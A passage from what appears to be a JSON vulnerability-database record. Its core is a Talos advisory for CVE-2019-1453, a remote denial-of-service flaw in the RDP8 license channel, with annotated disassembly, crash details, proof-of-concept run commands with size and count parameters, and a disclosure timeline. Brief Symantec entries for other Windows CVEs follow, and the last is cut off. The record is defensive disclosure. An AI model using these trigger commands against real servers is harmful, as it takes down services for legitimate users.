rdpcorets!CUMRDPConnection::CreateVirtualChannel+0x336 (000007fe`f9ae1c52)\n ...\n 000007fe`f9ae1ba6 488d0d432df7ff lea rcx,[rdpcorets!`string' (000007fe`f9a548f0)] ; \"Microsoft::Windows::RDS::Graphics\"\n 000007fe`f9ae1bad 498bd7 mov rdx,r15\n 000007fe`f9ae1bb0 ff1552822700 call qword ptr [rdpcorets!_imp__stricmp (000007fe`f9d59e08)]\n 000007fe`f9ae1bb6 85c0 test eax,eax\n 000007fe`f9ae1bb8 0f8494000000 je rdpcorets!CUMRDPConnection::CreateVirtualChannel+0x336 (000007fe`f9ae1c52)\n ...\n 000007fe`f9ae1bbe 488d0d4f2df7ff lea rcx,[rdpcorets!`string' (000007fe`f9a54914)] ; \"RDPSND\"\n 000007fe`f9ae1bc5 498bd7 mov rdx,r15\n 000007fe`f9ae1bc8 ff153a822700 call qword ptr [rdpcorets!_imp__stricmp (000007fe`f9d59e08)]\n 000007fe`f9ae1bce 85c0 test eax,eax\n 000007fe`f9ae1bd0 7504 jne rdpcorets!CUMRDPConnection::CreateVirtualChannel+0x2ba (000007fe`f9ae1bd6)\n \n\nWhen creating the endpoint for the \u201crdplic\u201d channel, the service will first call the `CUMRDPLicPluginFactory_CreateInstance` function. This object is responsible for creating instances of the `CUMRDPLicPlugin` object as needed. This is done with the `IRDPCOREChannelPluginFactory` interface. One of the methods within this interface is the `CUMRDPLicPluginFactory::CreateConnectionChannel` method and is shown in the following disassembly. When creating an instance for the channel, this method will create a COM interface by calling the `__RDPAPIDLL__CreateInstance` function with the CLSID and IID (Interface ID) specified at [2]. Once finally calling `__RDPAPIDLL__CreateInstance` at [3], the `CUMRDPLicPlugin_CreateInstance` function will then be called. This is the function that\u2019s actually responsible for creating an instance of a `CUMRDLicPlugin`. First at [4], the function will allocate 0xd8 bytes for the object. Afterwards, the object\u2019s virtual method tables will be populated by the function. One of the method tables at [5], `IRDPCoreVirtualChannelEvents`, is responsible for actually receiving events as a channel endpoint and is implemented by a number of other objects for the channel names that were prior mentioned.\n \n \n rdpcorets!CUMRDPLicPluginFactory::CreateConnectionChannels:\n 000007fe`f9ae8930 4055 push rbp\n 000007fe`f9ae8932 53 push rbx\n 000007fe`f9ae8933 56 push rsi\n 000007fe`f9ae8934 57 push rdi\n 000007fe`f9ae8935 4156 push r14\n 000007fe`f9ae8937 488bec mov rbp,rsp\n 000007fe`f9ae893a 4883ec40 sub rsp,40h\n ...\n rdpcorets!CUMRDPLicPluginFactory::CreateConnectionChannels+0x197:\n 000007fe`f9ae8ac7 488b4e40 mov rcx,qword ptr [rsi+40h]\n 000007fe`f9ae8acb 4c8d4d30 lea r9,[rbp+30h]\n 000007fe`f9ae8acf 4c8d0592b1f6ff lea r8,[rdpcorets!IID_IUMTSLicensePlugin (000007fe`f9a53c68)] ; [2] IID_IUMTSLicensePlugin\n 000007fe`f9ae8ad6 488d158b98f6ff lea rdx,[rdpcorets!CLSID_UMRDPLICPlugin (000007fe`f9a52368)] ; [2] CLSID_UMRDPLICPlugin\n 000007fe`f9ae8add e8e2c80000 call rdpcorets!__RDPAPIDLL__CreateInstance (000007fe`f9af53c4) ; [3] \\\\\n 000007fe`f9ae8ae2 8bd8 mov ebx,eax\n 000007fe`f9ae8ae4 85c0 test eax,eax\n 000007fe`f9ae8ae6 7944 jns rdpcorets!CUMRDPLicPluginFactory::CreateConnectionChannels+0x1fc (000007fe`f9ae8b2c)\n \\\\\n rdpcorets!CUMRDPLicPlugin_CreateInstance:\n 000007fe`f9ae8ed8 488bc4 mov rax,rsp\n 000007fe`f9ae8edb 48895808 mov qword ptr [rax+8],rbx\n 000007fe`f9ae8edf 48896810 mov qword ptr [rax+10h],rbp\n 000007fe`f9ae8ee3 48897018 mov qword ptr [rax+18h],rsi\n 000007fe`f9ae8ee7 48897820 mov qword ptr [rax+20h],rdi\n 000007fe`f9ae8eeb 4156 push r14\n 000007fe`f9ae8eed 4883ec30 sub rsp,30h\n ...\n 000007fe`f9ae8ef1 488bf9 mov rdi,rcx\n 000007fe`f9ae8ef4 b9d8000000 mov ecx,0D8h\n 000007fe`f9ae8ef9 498bf0 mov rsi,r8\n 000007fe`f9ae8efc 488bea mov rbp,rdx\n 000007fe`f9ae8eff ff158b0f2700 call qword ptr [rdpcorets!_imp_??2YAPEAX_KZ (000007fe`f9d59e90)] ; [4] allocate 0xd8 bytes\n 000007fe`f9ae8f05 4533f6 xor r14d,r14d\n 000007fe`f9ae8f08 488bd8 mov rbx,rax\n 000007fe`f9ae8f0b 4885c0 test rax,rax\n 000007fe`f9ae8f0e 0f84b4000000 je rdpcorets!CUMRDPLicPlugin_CreateInstance+0xf0 (000007fe`f9ae8fc8)\n ...\n 000007fe`f9ae8f14 c74030cdabcadb mov dword ptr [rax+30h],0DBCAABCDh\n 000007fe`f9ae8f1b c7403401000000 mov dword ptr [rax+34h],1\n 000007fe`f9ae8f22 4883c020 add rax,20h\n 000007fe`f9ae8f26 48894018 mov qword ptr [rax+18h],rax\n 000007fe`f9ae8f2a 488d0d3740fcff lea rcx,[rdpcorets!CCaRdpGfxEncoderRaw::`vftable' (000007fe`f9aacf68)] ; Default INonDelegatingUnknown\n 000007fe`f9ae8f31 458d4640 lea r8d,[r14+40h]\n 000007fe`f9ae8f35 488908 mov qword ptr [rax],rcx\n 000007fe`f9ae8f38 488d0dc9aff6ff lea rcx,[rdpcorets!CTSUnknown::`vftable' (000007fe`f9a53f08)] ; Default CTSObject\n 000007fe`f9ae8f3f 33d2 xor edx,edx\n 000007fe`f9ae8f41 48894808 mov qword ptr [rax+8],rcx\n 000007fe`f9ae8f45 44897020 mov dword ptr [rax+20h],r14d\n 000007fe`f9ae8f49 488d0da0cbfbff lea rcx,[rdpcorets!CUMRDPLicPlugin::`vftable' (000007fe`f9aa5af0)] ; [5] Implementation of IRDPCoreVirtualChannelEvents\n 000007fe`f9ae8f50 48890b mov qword ptr [rbx],rcx\n 000007fe`f9ae8f53 488d0d66cbfbff lea rcx,[rdpcorets!CUMRDPLicPlugin::`vftable' (000007fe`f9aa5ac0)] ; Implementation of IRDPCOREChannelPlugin\n 000007fe`f9ae8f5a 48894b08 mov qword ptr [rbx+8],rcx\n 000007fe`f9ae8f5e 488d0d3bcbfbff lea rcx,[rdpcorets!CUMRDPLicPlugin::`vftable' (000007fe`f9aa5aa0)] ; Implementation of IUMTSLicensePlugin\n 000007fe`f9ae8f65 48894b10 mov qword ptr [rbx+10h],rcx\n 000007fe`f9ae8f69 488d0df8cafbff lea rcx,[rdpcorets!CUMRDPLicPlugin::`vftable' (000007fe`f9aa5a68)] ; Implementation of IWRdsProtocolLicenseConnection\n 000007fe`f9ae8f70 48894b18 mov qword ptr [rbx+18h],rcx\n 000007fe`f9ae8f74 488d0dd5cafbff lea rcx,[rdpcorets!CUMRDPLicPlugin::`vftable' (000007fe`f9aa5a50)] ; Implementation of INonDelegatingUnknown\n 000007fe`f9ae8f7b 488908 mov qword ptr [rax],rcx\n 000007fe`f9ae8f7e 488d05abcafbff lea rax,[rdpcorets!CUMRDPLicPlugin::`vftable' (000007fe`f9aa5a30)] ; Implementation of CTSObject\n 000007fe`f9ae8f85 488d8b88000000 lea rcx,[rbx+88h]\n 000007fe`f9ae8f8c 48894328 mov qword ptr [rbx+28h],rax\n \n\nThe implementation of the `IRDPCoreVirtualChannelEvents` method table is as follows. When receiving data on the \u201crdplic\u201d channel, the `CUMRDPLicPlugin::OnDataReceived` method at [6] will be called with the channel data and its length as its parameters.\n \n \n 000007fe`f9aa5af0 000007fe`f9c1126c rdpcorets!CUMRDPLicPlugin::QueryInterface\n 000007fe`f9aa5af8 000007fe`f9ae84b0 rdpcorets!CRDPGfxPlugin::AddRef\n 000007fe`f9aa5b00 000007fe`f9ae84c4 rdpcorets!CUMTSCommandPlugin::Release\n 000007fe`f9aa5b08 000007fe`f9ae95f0 rdpcorets!CUMRDPLicPlugin::OnDataReceived ; [6]\n 000007fe`f9aa5b10 000007fe`f9ae9570 rdpcorets!CUMRDPLicPlugin::OnClose\n 000007fe`f9aa5b18 000007fe`f9ae9560 rdpcorets!CUMRDPLicPlugin::OnChannelOpened\n 000007fe`f9aa5b20 000007fe`f9ae95d0 rdpcorets!CUMRDPLicPlugin::OnDataSent\n 000007fe`f9aa5b28 000007fe`f9aea544 rdpcorets!CFakeGfxProvider::HandleSHMUpdate\n 000007fe`f9aa5b30 000007fe`f9ae924c rdpcorets!CUMRDPLicPlugin::Initialize\n \n\nAs was prior mentioned, data written to the \u201crdplic\u201d channel will result in the server executing the following method to handle its endpoint. This method takes two parameters at [7] representing the channel data and its length. This data is taken directly from the client and is intended to be processed by this method. Once these values are loaded into the `%r8` and `%r15d` registers, the method will continue and then check the first 16-bits of the channel data at [8] to see if they\u2019re one of 3 possible values. Depending on the value, one of the cases listed will be entered. At [9] when the first 16-bits are set to 0x1630, the handler for its case will be entered. This handler will simply hand-off the channel data and its length to the `CUMRDPLicPlugin::HandleClientLicensePdu` method at [10]. As this method is called anytime data is written to the channel, these cases can be called repeatedly and at anytime the remote client chooses.\n \n \n rdpcorets!CUMRDPLicPlugin::OnDataReceived:\n 000007fe`f9ae95f0 48895c2408 mov qword ptr [rsp+8],rbx\n 000007fe`f9ae95f5 48896c2410 mov qword ptr [rsp+10h],rbp\n 000007fe`f9ae95fa 4889742418 mov qword ptr [rsp+18h],rsi\n 000007fe`f9ae95ff 57 push rdi\n 000007fe`f9ae9600 4156 push r14\n 000007fe`f9ae9602 4157 push r15\n 000007fe`f9ae9604 4883ec20 sub rsp,20h\n 000007fe`f9ae9608 33f6 xor esi,esi\n 000007fe`f9ae960a 4d8bf0 mov r14,r8 ; [7] Channel Data\n 000007fe`f9ae960d 448bfa mov r15d,edx ; [7] Channel Data Length\n 000007fe`f9ae9610 488be9 mov rbp,rcx ; CUMRDPLicPlugin*\n 000007fe`f9ae9613 4d85c0 test r8,r8\n 000007fe`f9ae9616 7543 jne rdpcorets!CUMRDPLicPlugin::OnDataReceived+0x6b (000007fe`f9ae965b)\n ...\n rdpcorets!CUMRDPLicPlugin::OnDataReceived+0x6b:\n 000007fe`f9ae965b b301 mov bl,1\n 000007fe`f9ae965d 488d3dbc0a2100 lea rdi,[rdpcorets!WPP_GLOBAL_Control (000007fe`f9cfa120)]\n 000007fe`f9ae9664 83fa04 cmp edx,4\n 000007fe`f9ae9667 732b jae rdpcorets!CUMRDPLicPlugin::OnDataReceived+0xa4 (000007fe`f9ae9694)\n ...\n rdpcorets!CUMRDPLicPlugin::OnDataReceived+0xa4:\n 000007fe`f9ae9694 488b0d850a2100 mov rcx,qword ptr [rdpcorets!WPP_GLOBAL_Control (000007fe`f9cfa120)]\n 000007fe`f9ae969b 410fb706 movzx eax,word ptr [r14] ; [8] Read 16-bits from beginning of ChannelData packet\n 000007fe`f9ae969f 3d30130000 cmp eax,1330h\n 000007fe`f9ae96a4 0f8493000000 je rdpcorets!CUMRDPLicPlugin::OnDataReceived+0x14d (000007fe`f9ae973d)\n ...\n 000007fe`f9ae96aa 3d30160000 cmp eax,1630h ; [9] Check if 16-bits are 0x1630\n 000007fe`f9ae96af 747a je rdpcorets!CUMRDPLicPlugin::OnDataReceived+0x13b (000007fe`f9ae972b)\n ...\n 000007fe`f9ae96b1 3d30190000 cmp eax,1930h\n 000007fe`f9ae96b6 7425 je rdpcorets!CUMRDPLicPlugin::OnDataReceived+0xed (000007fe`f9ae96dd)\n ...\n rdpcorets!CUMRDPLicPlugin::OnDataReceived+0x13b:\n 000007fe`f9ae972b 4d8bc6 mov r8,r14 ; [10] Channel Data\n 000007fe`f9ae972e 418bd7 mov edx,r15d ; Channel Data Length\n 000007fe`f9ae9731 488bcd mov rcx,rbp ; CUMRDPLicPlugin*\n 000007fe`f9ae9734 e8fb0a0000 call rdpcorets!CUMRDPLicPlugin::HandleClientLicensePdu (000007fe`f39ca234)\n 000007fe`f9ae9739 8bf0 mov esi,eax\n 000007fe`f9ae973b eb45 jmp rdpcorets!CUMRDPLicPlugin::OnDataReceived+0x192 (000007fe`f39c9782)\n \n\nAfter the channel data and its length are passed to the `CUMRDPLicPlugin::HandleClientLicensePdu` method, these values are then loaded into registers at [11] with the channel data being loaded from the `%r8` register into `%rbp`, and the channel data\u2019s length left in `%edx`. At [12], the channel data\u2019s length will be checked to see if it\u2019s larger than 9. If so, then the code at [13] will be executed. This will read 32-bits from the channel data at [13], and then use the 32-bits directly as a parameter to the allocation that follows (`operator new`). As the remote client controls the length that is being used, this allows the client to make arbitrarily sized allocations. Once the allocation has been made at [14], the result will then be written into offset 0x78 of the `CUMRDPLicPlugin` object. As a result of this property being overwritten, the previous value of the property is removed from the scope of the object before being properly released which can allow the remote client to repeatedly make controlled allocations to trigger memory exhaustion. Afterwards at [15], the channel data at offset +0x8 of the packet will be copied into the buffer that was allocated. As the client controls the length of this allocated buffer and the length used while copying channel data from the packet, a remote client can specify a length that is larger than the source packet data resulting in the `memcpy()` function reading from unmapped memory while trying to copy data. This can result in a denial of service condition.\n \n \n rdpcorets!CUMRDPLicPlugin::HandleClientLicensePdu:\n 000007fe`f9aea234 48895c2408 mov qword ptr [rsp+8],rbx\n 000007fe`f9aea239 48896c2410 mov qword ptr [rsp+10h],rbp\n 000007fe`f9aea23e 4889742418 mov qword ptr [rsp+18h],rsi\n 000007fe`f9aea243 57 push rdi\n 000007fe`f9aea244 4883ec30 sub rsp,30h\n 000007fe`f9aea248 33db xor ebx,ebx\n 000007fe`f9aea24a 498be8 mov rbp,r8 ; [11] Channel Data\n 000007fe`f9aea24d 488bf1 mov rsi,rcx ; CUMRDPLicPlugin*\n 000007fe`f9aea250 4d85c0 test r8,r8\n 000007fe`f9aea253 0f8426010000 je rdpcorets!CUMRDPLicPlugin::HandleClientLicensePdu+0x14b (000007fe`f9aea37f)\n 000007fe`f9aea259 83fa09 cmp edx,9 ; [12] Channel Length\n 000007fe`f9aea25c 0f821d010000 jb rdpcorets!CUMRDPLicPlugin::HandleClientLicensePdu+0x14b (000007fe`f9aea37f)\n 000007fe`f9aea262 488d3db7fe2000 lea rdi,[rdpcorets!WPP_GLOBAL_Control (000007fe`f9aea120)]\n 000007fe`f9aea269 41395804 cmp dword ptr [r8+4],ebx\n 000007fe`f9aea26d 7545 jne rdpcorets!CUMRDPLicPlugin::HandleClientLicensePdu+0x80 (000007fe`f9aea2b4)\n ...\n rdpcorets!CUMRDPLicPlugin::HandleClientLicensePdu+0x80:\n 000007fe`f9aea2b4 418b4804 mov ecx,dword ptr [r8+4] ; [13] 32-bits from offset +0x4 of Channel Data\n 000007fe`f9aea2b8 ff15c2fb2600 call qword ptr [rdpcorets!_imp_??_UYAPEAX_KZ (000007fe`f9ae9e80)]\n 000007fe`f9aea2be 48894678 mov qword ptr [rsi+78h],rax ; [14] Overwrite value at offset +0x78 of Object\n 000007fe`f9aea2c2 4885c0 test rax,rax\n 000007fe`f9aea2c5 7555 jne rdpcorets!CUMRDPLicPlugin::HandleClientLicensePdu+0xe8 (000007fe`f9aea31c)\n ...\n rdpcorets!CUMRDPLicPlugin::HandleClientLicensePdu+0xe8:\n 000007fe`f9aea31c 448b4504 mov r8d,dword ptr [rbp+4]\n 000007fe`f9aea320 488d5508 lea rdx,[rbp+8] ; [15] Copy data from packet into allocation\n 000007fe`f9aea324 488bc8 mov rcx,rax\n 000007fe`f9aea327 e8c4951f00 call rdpcorets!memcpy (000007fe`f9ce38f0)\n \n\n### Crash Information\n\nThe base addresses of the functions described in the details are as follows:\n \n \n 0:032> lm vm rdpcorets\n Browse full module list\n start end module name\n 000007fe`f9a50000 000007fe`f9d72000 rdpcorets (pdb symbols) c:\\mss\\RdpCoreTS.pdb\\31C641C49232486FB999919FB0EBFC611\\RdpCoreTS.pdb\n Loaded symbol image file: rdpcorets.dll\n Image path: C:\\Windows\\system32\\rdpcorets.dll\n Image name: rdpcorets.dll\n Browse all global symbols functions data\n Timestamp: Thu Jun 4 22:28:31 2015 (5571175F)\n CheckSum: 003110B6\n ImageSize: 00322000\n File version: 6.2.9200.21506\n Product version: 6.2.9200.21506\n File flags: 0 (Mask 3F)\n File OS: 40004 NT Win32\n File type: 1.0 App\n File date: 00000000.00000000\n Translations: 0409.04b0\n Information from resource tables:\n CompanyName: Microsoft Corporation\n ProductName: Microsoft\u00ae Windows\u00ae Operating System\n InternalName: RdpCoreTS.dll\n OriginalFilename: RdpCoreTS.dll\n ProductVersion: 6.2.9200.21506\n FileVersion: 6.2.9200.21506 (win8_ldr.150604-1607)\n FileDescription: TS RDPCore DLL\n LegalCopyright: \u00a9 Microsoft Corporation. All rights reserved.\n \n\n### Exploit Proof of Concept\n\nTo run the provided proof-of-concept, Python2 and the `six` module must be installed. To install the `six` module, one can simply use `pip` as follows:\n \n \n $ pip install six\n \n\nAfter installing the required modules, the proof-of-concept can then be run with the following command against RDS. To use the provided vulnerability to make a number of controlled allocations with the vulnerability, one may specify the size to use and the number of times to make it via the following parameters.\n \n \n $ python poc.zip $host --size=$size --count=$count\n \n\nIn order to make the `memcpy()` operation read from an unmapped page at the end of the channel data, a large length will be needed as long as it is small enough to satisfy the memory allocation. Something similar to the following may be used to trigger a crash with the vulnerability.\n \n \n $ python poc.zip $host --size=0x100000 --count=0x10\n \n\nFor further help, the `--help` parameter has also been implemented.\n\n### Mitigation\n\nThis denial-of-service vulnerability exist only on RDP8. RDP7, which is implemented in kernel-space, does not use the channels described within this document, and therefore is not vulnerable.\n\n### Timeline\n\n2019-09-19 - Vendor Disclosure \n2019-10-29 - 30 day follow up \n2019-10-29 - Vendor assigned CVE \n2019-12-10 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T00:00:00", "type": "talos", "title": "Microsoft Remote Desktop Services (RDP8) license negotiation denial-of-service vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1453"], "modified": "2019-12-10T00:00:00", "id": "TALOS-2019-0901", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0901", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "symantec": [{"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2019-1474 Local Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1474"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111067", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111067", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows Win32k CVE-2019-1458 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1458"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111060", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111060", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows GDI Component CVE-2019-1467 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1467"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111049", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111049", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows Remote Desktop Protocol is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause the target service to stop responding, denying service to legitimate users.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 Version 1903 for 32-bit Systems \n * Microsoft Windows 10 Version 1903 for ARM64-based Systems \n * Microsoft Windows 10 Version 1903 for x64-based Systems \n * Microsoft Windows 10 Version 1909 for 32-bit Systems \n * Microsoft Windows 10 Version 1909 for ARM64-based Systems \n * Microsoft Windows 10 Version 1909 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 1903 \n * Microsoft Windows Server 1909 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't required. Restricting access to only trusted computers and networks might greatly reduce the likelihood of exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the potential impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for anomalous or suspicious activity. Monitor logs generated by NIDS and by the server itself for evidence of attacks against the server. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "symantec", "title": "Microsoft Windows Remote Desktop Protocol CVE-2019-1453 Denial of Service Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-1453"], "modified": "2019-12-10T00:00:00", "id": "SMNTC-111057", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111057", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T19:06:03", "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft 